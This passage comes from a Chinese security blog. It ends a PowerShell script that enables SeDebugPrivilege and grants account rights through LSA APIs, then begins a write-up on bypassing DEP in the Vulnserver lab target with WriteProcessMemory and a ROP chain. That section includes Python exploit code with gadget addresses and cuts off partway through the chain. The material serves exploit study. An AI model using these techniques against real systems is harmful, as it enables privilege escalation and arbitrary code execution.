SeDebugPrivilege if needed</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$DebugVal</span> <span class="operator">-eq</span> <span class="string">"Disabled"</span>) {</span><br><span class="line"> echo <span class="string">"[?] SeDebugPrivilege is disabled, enabling..`n"</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Prepare TokPriv1Luid container</span></span><br><span class="line"> <span class="variable">$TokPriv1Luid</span> = <span class="built_in">New-Object</span> TokPriv1Luid</span><br><span class="line"> <span class="variable">$TokPriv1Luid</span>.Count = <span class="number">1</span></span><br><span class="line"> <span class="variable">$TokPriv1Luid</span>.Attr = <span class="number">0</span>x00000002 <span class="comment"># SE_PRIVILEGE_ENABLED</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Get SeDebugPrivilege luid</span></span><br><span class="line"> <span class="variable">$LuidVal</span> = <span class="variable">$Null</span></span><br><span class="line"> echo <span class="string">"[>] Calling Advapi32::LookupPrivilegeValue --> SeDebugPrivilege"</span></span><br><span class="line"> <span class="variable">$CallResult</span> = [<span class="type">Advapi32</span>]::LookupPrivilegeValue(<span class="variable">$null</span>, <span class="string">"SeDebugPrivilege"</span>, [<span class="type">ref</span>]<span class="variable">$LuidVal</span>)</span><br><span class="line"> echo <span class="string">"[+] SeDebugPrivilege LUID value: <span class="variable">$LuidVal</span>`n"</span></span><br><span class="line"> <span class="variable">$TokPriv1Luid</span>.Luid = <span class="variable">$LuidVal</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Enable SeDebugPrivilege for the current process</span></span><br><span class="line"> echo <span class="string">"[>] Calling Advapi32::AdjustTokenPrivileges`n"</span></span><br><span class="line"> <span class="variable">$CallResult</span> = [<span class="type">Advapi32</span>]::AdjustTokenPrivileges(<span class="variable">$hTokenHandle</span>, <span class="variable">$False</span>, [<span class="type">ref</span>]<span class="variable">$TokPriv1Luid</span>, <span class="number">0</span>, [<span class="built_in">Int</span><span class="type">Ptr</span>]::Zero, [<span class="built_in">Int</span><span class="type">Ptr</span>]::Zero)</span><br><span class="line"> <span class="keyword">if</span> (!<span class="variable">$CallResult</span>) {</span><br><span class="line"> <span class="variable">$LastError</span> = [<span class="type">Kernel32</span>]::GetLastError()</span><br><span class="line"> echo <span class="string">"[!] Mmm, something went wrong! GetLastError returned: <span class="variable">$LastError</span>`n"</span></span><br><span class="line"> <span class="keyword">Return</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> echo <span class="string">"[?] SeDebugPrivilege is enabled!`n"</span></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="built_in">Add-Type</span> <span class="literal">-TypeDefinition</span> <span class="string">@'</span></span><br><span class="line"><span class="string">using System;</span></span><br><span class="line"><span class="string">using System.Text;</span></span><br><span class="line"><span class="string">using System.Security.Principal;</span></span><br><span class="line"><span class="string">using System.Runtime.InteropServices;</span></span><br><span class="line"><span class="string">using System.ComponentModel;</span></span><br><span class="line"><span class="string">[StructLayout(LayoutKind.Sequential, Pack = 1)]</span></span><br><span class="line"><span class="string">public struct TokPriv1Luid</span></span><br><span class="line"><span class="string">{</span></span><br><span class="line"><span class="string"> public int Count;</span></span><br><span class="line"><span class="string"> public long Luid;</span></span><br><span class="line"><span class="string"> public int Attr;</span></span><br><span class="line"><span class="string">}</span></span><br><span class="line"><span class="string">public static class Advapi32</span></span><br><span class="line"><span class="string">{</span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError=true)]</span></span><br><span class="line"><span class="string"> public static extern bool OpenProcessToken(</span></span><br><span class="line"><span class="string"> IntPtr ProcessHandle, </span></span><br><span class="line"><span class="string"> int DesiredAccess,</span></span><br><span class="line"><span class="string"> ref IntPtr TokenHandle);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError=true)]</span></span><br><span class="line"><span class="string"> public static extern bool LookupPrivilegeValue(</span></span><br><span class="line"><span class="string"> string lpSystemName,</span></span><br><span class="line"><span class="string"> string lpName,</span></span><br><span class="line"><span class="string"> ref long lpLuid);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError = true)]</span></span><br><span class="line"><span class="string"> public static extern bool AdjustTokenPrivileges(</span></span><br><span class="line"><span class="string"> IntPtr TokenHandle,</span></span><br><span class="line"><span class="string"> bool DisableAllPrivileges,</span></span><br><span class="line"><span class="string"> ref TokPriv1Luid NewState,</span></span><br><span class="line"><span class="string"> int BufferLength,</span></span><br><span class="line"><span class="string"> IntPtr PreviousState,</span></span><br><span class="line"><span class="string"> IntPtr ReturnLength);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError=true)]</span></span><br><span class="line"><span class="string"> public extern static bool DuplicateToken(</span></span><br><span class="line"><span class="string"> IntPtr ExistingTokenHandle,</span></span><br><span class="line"><span class="string"> int SECURITY_IMPERSONATION_LEVEL,</span></span><br><span class="line"><span class="string"> ref IntPtr DuplicateTokenHandle);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError=true)]</span></span><br><span class="line"><span class="string"> public static extern bool SetThreadToken(</span></span><br><span class="line"><span class="string"> IntPtr Thread,</span></span><br><span class="line"><span class="string"> IntPtr Token);</span></span><br><span class="line"><span class="string">}</span></span><br><span class="line"><span class="string">public static class LSAWrapper</span></span><br><span class="line"><span class="string">{</span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", PreserveSig = true)]</span></span><br><span class="line"><span class="string"> private static extern UInt32 LsaOpenPolicy(</span></span><br><span class="line"><span class="string"> ref LSA_UNICODE_STRING SystemName,</span></span><br><span class="line"><span class="string"> ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,</span></span><br><span class="line"><span class="string"> Int32 DesiredAccess,</span></span><br><span class="line"><span class="string"> out IntPtr PolicyHandle</span></span><br><span class="line"><span class="string"> );</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]</span></span><br><span class="line"><span class="string"> private static extern long LsaAddAccountRights(</span></span><br><span class="line"><span class="string"> IntPtr PolicyHandle,</span></span><br><span class="line"><span class="string"> IntPtr AccountSid,</span></span><br><span class="line"><span class="string"> LSA_UNICODE_STRING[] UserRights,</span></span><br><span class="line"><span class="string"> long CountOfRights);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll")]</span></span><br><span class="line"><span class="string"> private static extern long LsaClose(IntPtr objectHandle);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [DllImport("kernel32.dll")]</span></span><br><span class="line"><span class="string"> private static extern int GetLastError();</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [DllImport("advapi32.dll")]</span></span><br><span class="line"><span class="string"> private static extern long LsaNtStatusToWinError(long status);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [StructLayout(LayoutKind.Sequential)]</span></span><br><span class="line"><span class="string"> private struct LSA_OBJECT_ATTRIBUTES</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> public int Length;</span></span><br><span class="line"><span class="string"> public IntPtr RootDirectory;</span></span><br><span class="line"><span class="string"> public readonly LSA_UNICODE_STRING ObjectName;</span></span><br><span class="line"><span class="string"> public UInt32 Attributes;</span></span><br><span class="line"><span class="string"> public IntPtr SecurityDescriptor;</span></span><br><span class="line"><span class="string"> public IntPtr SecurityQualityOfService;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [StructLayout(LayoutKind.Sequential)]</span></span><br><span class="line"><span class="string"> private struct LSA_UNICODE_STRING</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> public UInt16 Length;</span></span><br><span class="line"><span class="string"> public UInt16 MaximumLength;</span></span><br><span class="line"><span class="string"> public IntPtr Buffer;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> [Flags]</span></span><br><span class="line"><span class="string"> private enum LSA_AccessPolicy : long</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> POLICY_VIEW_LOCAL_INFORMATION = 0x00000001L,</span></span><br><span class="line"><span class="string"> POLICY_VIEW_AUDIT_INFORMATION = 0x00000002L,</span></span><br><span class="line"><span class="string"> POLICY_GET_PRIVATE_INFORMATION = 0x00000004L,</span></span><br><span class="line"><span class="string"> POLICY_TRUST_ADMIN = 0x00000008L,</span></span><br><span class="line"><span class="string"> POLICY_CREATE_ACCOUNT = 0x00000010L,</span></span><br><span class="line"><span class="string"> POLICY_CREATE_SECRET = 0x00000020L,</span></span><br><span class="line"><span class="string"> POLICY_CREATE_PRIVILEGE = 0x00000040L,</span></span><br><span class="line"><span class="string"> POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080L,</span></span><br><span class="line"><span class="string"> POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100L,</span></span><br><span class="line"><span class="string"> POLICY_AUDIT_LOG_ADMIN = 0x00000200L,</span></span><br><span class="line"><span class="string"> POLICY_SERVER_ADMIN = 0x00000400L,</span></span><br><span class="line"><span class="string"> POLICY_LOOKUP_NAMES = 0x00000800L,</span></span><br><span class="line"><span class="string"> POLICY_NOTIFICATION = 0x00001000L</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> //POLICY_ALL_ACCESS mask <http://msdn.microsoft.com/en-us/library/windows/desktop/ms721916%28v=vs.85%29.aspx></span></span><br><span class="line"><span class="string"> private const int POLICY_ALL_ACCESS = (int)(</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_AUDIT_LOG_ADMIN |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_CREATE_ACCOUNT |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_CREATE_PRIVILEGE |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_CREATE_SECRET |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_GET_PRIVATE_INFORMATION |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_LOOKUP_NAMES |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_NOTIFICATION |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_SERVER_ADMIN |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_SET_AUDIT_REQUIREMENTS |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_SET_DEFAULT_QUOTA_LIMITS |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_TRUST_ADMIN |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_VIEW_AUDIT_INFORMATION |</span></span><br><span class="line"><span class="string"> LSA_AccessPolicy.POLICY_VIEW_LOCAL_INFORMATION</span></span><br><span class="line"><span class="string"> );</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> public static void SetRight(string accountName, string privilegeName)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //Convert assigned privilege to LSA_UNICODE_STRING[] object</span></span><br><span class="line"><span class="string"> var userRights = GetUserRightsObject(privilegeName);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> //Get account SID and pin object for P/Invoke</span></span><br><span class="line"><span class="string"> var sid = GetBinarySID(accountName);</span></span><br><span class="line"><span class="string"> var handle = GCHandle.Alloc(sid, GCHandleType.Pinned);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> //Open LSA policy</span></span><br><span class="line"><span class="string"> IntPtr policyHandle = OpenPolicyHandle();</span></span><br><span class="line"><span class="string"> try</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //add the right to the account</span></span><br><span class="line"><span class="string"> long status = LsaAddAccountRights(policyHandle, handle.AddrOfPinnedObject(), userRights, userRights.Length);</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> var winErrorCode = LsaNtStatusToWinError(status);</span></span><br><span class="line"><span class="string"> if (winErrorCode != 0)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> throw new Win32Exception((int)winErrorCode, "LsaAddAccountRights failed");</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> finally</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> handle.Free();</span></span><br><span class="line"><span class="string"> Marshal.FreeHGlobal(userRights[0].Buffer); //Can use LsaFreeMemory instead?</span></span><br><span class="line"><span class="string"> LsaClose(policyHandle); </span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> private static LSA_UNICODE_STRING[] GetUserRightsObject(string privilegeName)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //initialize userRights objects</span></span><br><span class="line"><span class="string"> return new[]</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> new LSA_UNICODE_STRING</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> Buffer = Marshal.StringToHGlobalUni(privilegeName),</span></span><br><span class="line"><span class="string"> Length = (UInt16)(privilegeName.Length * UnicodeEncoding.CharSize),</span></span><br><span class="line"><span class="string"> MaximumLength = (UInt16)((privilegeName.Length + 1) * UnicodeEncoding.CharSize)</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> };</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> private static byte[] GetBinarySID(string accountName)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //Get account SID</span></span><br><span class="line"><span class="string"> NTAccount account;</span></span><br><span class="line"><span class="string"> try</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> account = new NTAccount(accountName);</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> catch(IdentityNotMappedException)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> throw; //TODO:ErrorHandling</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> //Convert SID to byte[]</span></span><br><span class="line"><span class="string"> var identity = (SecurityIdentifier)account.Translate(typeof(SecurityIdentifier));</span></span><br><span class="line"><span class="string"> var buffer = new byte[identity.BinaryLength];</span></span><br><span class="line"><span class="string"> identity.GetBinaryForm(buffer, 0);</span></span><br><span class="line"><span class="string"> return buffer;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> private static IntPtr OpenPolicyHandle()</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> //dummy variables</span></span><br><span class="line"><span class="string"> var systemName = new LSA_UNICODE_STRING();</span></span><br><span class="line"><span class="string"> var objectAttributes = new LSA_OBJECT_ATTRIBUTES</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> Length = 0,</span></span><br><span class="line"><span class="string"> RootDirectory = IntPtr.Zero,</span></span><br><span class="line"><span class="string"> Attributes = 0,</span></span><br><span class="line"><span class="string"> SecurityDescriptor = IntPtr.Zero,</span></span><br><span class="line"><span class="string"> SecurityQualityOfService = IntPtr.Zero</span></span><br><span class="line"><span class="string"> };</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> IntPtr policyHandle;</span></span><br><span class="line"><span class="string"> uint status = LsaOpenPolicy(ref systemName, ref objectAttributes, POLICY_ALL_ACCESS, out policyHandle);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> var winErrorCode = LsaNtStatusToWinError(status);</span></span><br><span class="line"><span class="string"> if (winErrorCode != 0)</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> throw new Win32Exception((int)winErrorCode, "LsaOpenPolicy failed");</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> return policyHandle;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string">}</span></span><br><span class="line"><span class="string">'@</span></span><br><span class="line"></span><br><span class="line">Main</span><br></pre></td></tr></table></figure>
<p>参考:</p>
<p>1.<a href="https://blog.csdn.net/singleyellow/article/details/93394557" target="_blank" rel="noopener">https://blog.csdn.net/singleyellow/article/details/93394557</a></p>
<p>2.<a href="https://www.powershellgallery.com/packages/PoshPrivilege/0.1.1.0/Content/Scripts%5CAdd-Privilege.ps1" target="_blank" rel="noopener">https://www.powershellgallery.com/packages/PoshPrivilege/0.1.1.0/Content/Scripts%5CAdd-Privilege.ps1</a></p>
<p>3.<a href="https://github.com/cloudbase/unattended-setup-scripts/blob/master/ServiceUserManagement.ps1" target="_blank" rel="noopener">https://github.com/cloudbase/unattended-setup-scripts/blob/master/ServiceUserManagement.ps1</a></p>
<p>4.<a href="https://gist.github.com/nijave/9174d5af9378a0c4ef1498795f1ead0d" target="_blank" rel="noopener">https://gist.github.com/nijave/9174d5af9378a0c4ef1498795f1ead0d</a></p>
<p>5.<a href="https://blog.palantir.com/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e" target="_blank" rel="noopener">https://blog.palantir.com/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e</a></p>
<p>6.<a href="https://gist.github.com/altrive/9151365" target="_blank" rel="noopener">https://gist.github.com/altrive/9151365</a></p>
<p>7.<a href="https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1" target="_blank" rel="noopener">https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/" class="post-title-link" itemprop="url">Vulnserver TRUN Bypass DEP With ROP On Win10 II</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-05-30 10:56:22" itemprop="dateCreated datePublished" datetime="2022-05-30T10:56:22Z">2022-05-30</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-10-08 13:47:07" itemprop="dateModified" datetime="2022-10-08T13:47:07Z">2022-10-08</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Windows-Exploitation/" itemprop="url" rel="index"><span itemprop="name">Windows Exploitation</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>这次,用<code>WriteProcessMemory</code>来<code>Bypass DEP</code>,看一下<code>WriteProcessMemory</code>的函数原型:</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">BOOL <span class="title">WriteProcessMemory</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params"> [in] HANDLE hProcess,</span></span></span><br><span class="line"><span class="function"><span class="params"> [in] LPVOID lpBaseAddress,</span></span></span><br><span class="line"><span class="function"><span class="params"> [in] LPCVOID lpBuffer,</span></span></span><br><span class="line"><span class="function"><span class="params"> [in] SIZE_T nSize,</span></span></span><br><span class="line"><span class="function"><span class="params"> [out] SIZE_T *lpNumberOfBytesWritten</span></span></span><br><span class="line"><span class="function"><span class="params">)</span></span>;</span><br></pre></td></tr></table></figure>
<p><code>hProcess:</code>要修改的进程内存的句柄。句柄必须具有对进程的 <code>PROCESS_VM_WRITE</code> 和 <code>PROCESS_VM_OPERATION</code> 访问权限。</p>
<p><code>lpBaseAddress:</code>指向要写入数据的指定进程中的基地址的指针。在数据传输发生之前,系统会验证指定大小的基地址和内存中的所有数据都可以进行写访问,如果不可访问,则函数失败。</p>
<p><code>lpBuffer:</code>指向缓冲区的指针,该缓冲区包含要写入指定进程地址空间的数据。</p>
<p><code>nSize:</code>要写入指定进程的字节数。</p>
<p><code>lpNumberOfBytesWritten:</code>指向变量的指针,该变量接收传输到指定进程的字节数。此参数是可选的。如果 <code>lpNumberOfBytesWritten</code> 为<code>NULL</code>,则忽略该参数。</p>
<p>根据函数各参数的说明,在<code>Bypass DEP</code>的时候,各参数的设置情况:</p>
<p><code>hProcess:</code>提供一个伪句柄,指定为特定的常量<code>-1</code>,当<code>WriteProcessMemory API</code>被调用的时候,它会将<code>-1</code>转换为实际进程句柄,也就意味着这个参数我们设置的时候可以忽略。</p>
<p><code>lpBaseAddress:</code>这个参数我们可以设置为一个绝对地址,其指向我们将要写入模块的代码段,为了不引起程序崩溃,可以指向代码段中未使用的区域。这里有个技巧,因为代码段在编译的时候需要对齐,所以选择在代码段上限的尾部即可,因为这里填充的一定是<code>null</code>字符。</p>
<p>在<code>windbg</code>中看一眼:</p>
<p>这里可以使用的是<code>essfunc.dll</code>。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/01.png" alt="BOF"></p>
<p>依据<code>PE</code>相关知识,获取代码段地址的步骤:</p>
<p><code>DOS Header + 0x3c</code>指向<code>PE Header</code>:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/02.png" alt="BOF"></p>
<p><code>PE Header + 0x2c</code>指向代码段:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/03.png" alt="BOF"></p>
<p>来获取<code>essfunc.dll</code>的代码段地址:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/04.png" alt="BOF"></p>
<p>获取的代码段地址为<code>62501000</code>,看一下对应的内存属性:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/05.png" alt="BOF"></p>
<p>定位到代码段某一地址(这里<code>62501c00</code> ,后续考虑地址不包含<code>00</code>字符,选择<code>62501c10</code>作为<code>lpBaseAddress</code>的值):</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/06.png" alt="BOF"></p>
<p><code>lpBuffer:</code>保存<code>shellcode</code>所在地址,这个地址需要到执行栈溢出之后,才能确定。</p>
<p><code>nSize:shellcode</code>的大小。几乎所以<code>metasploit</code>产生的<code>shellcode</code>大小都是小于<code>500bytes</code>,所以我们可以指定任意值,这里用<code>-524(0xfffffdf4)</code>代替,然后取反即可。换做<code>ROP Gadget</code>就是先把<code>0xfffffdf4</code>存入某个寄存器,如<code>EAX</code>,然后<code>NEG EAX</code>即可。</p>
<p><code>lpNumberOfBytesWritten:</code>指向一个可写的<code>DWORD</code>空间,用于保存<code>WriteProcessMemory</code>复制的<code>byte</code>数目。比较简单的方法是将其保存到<code>essfunc.dll</code>的数据段里面,来看一下:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0:001> !dh -a essfunc</span><br></pre></td></tr></table></figure>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/07.png" alt="BOF"></p>
<p>确认数据段里面的空间没有被使用:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/08.png" alt="BOF"></p>
<p>段需要对齐,可以查看<code>section alignment</code>的对齐为<code>1000</code>:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/09.png" alt="BOF"></p>
<p>前面<code>2000+24</code>的值不为<code>1000</code>的整数倍,所以后续会补<code>00</code>,直到它为<code>1000</code>的整数倍为止。我们在取值的时候<code>+4</code>正好可以落在为了补齐增加的<code>00</code>空间里,不需要刻意到前面去查找。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/10.png" alt="BOF"></p>
<p>接下来,就是在<code>essfunc.dll</code>的<code>IAT</code>中找是否存在<code>WriteProcessMemory</code>,利用<code>!dh essfunc.dll -f</code>查看<code>IAT</code>地址和偏移时发现都是空,有点诡异。</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/11.png" alt="BOF"></p>
<p>在<code>windbg</code>用命令<code>dps essfunc L2000</code>查看,找到一些信息:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/12.png" alt="BOF"></p>
<p>借用之前文章<a href="https://n0maj1o24.github.io/2022/05/28/Sync-Breeze-10-0-28-bypass-DEP/">《Sync Breeze 10.0.28 bypass DEP》</a>的方法获取<code>WriteProcessMemory</code>的地址,这里就不过多介绍了,国际友人那个脚本会出问题,还是得手动来:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/13.png" alt="BOF"></p>
<p>根据以上信息,<code>WriteProcessMemory</code>函数的部分参数是可以提前确定的:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">func = struct.pack(<span class="string">"<L"</span>,<span class="number">0x45454545</span>) <span class="comment"># WriteProcessMemory Address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Shellcode Return Address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0xFFFFFFFF</span>) <span class="comment"># pseudo Process handle</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Code cave address</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy lpBuffer (Stack address) </span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy nSize</span></span><br><span class="line">func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62502028</span>) <span class="comment"># lpNumberOfBytesWritten</span></span><br></pre></td></tr></table></figure>
<p>现在需要关注的仅为WriteProcessMemory函数地址,shellcode在栈空间的地址,以及shellcode的大小。</p>
<p>这里在确定shellcode栈空间的时候,主动腾出了一片栈空间,保证ROP Gadget不会超出这块空间,也就确定了shellcode的地址,因为只需要接在这块空间之后即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">rop1 = struct.pack(<span class="string">"<L"</span>, <span class="number">0x755912d6</span>) <span class="comment"># PUSH ESP # POP ESI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x755b671f</span>) <span class="comment"># MOV EDX,ESI # POP ESI # RETN 0x04 </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7728bdf4</span>) <span class="comment"># MOV EAX,EDX # POP ESI # RETN </span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line">rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"></span><br><span class="line">rop1 += 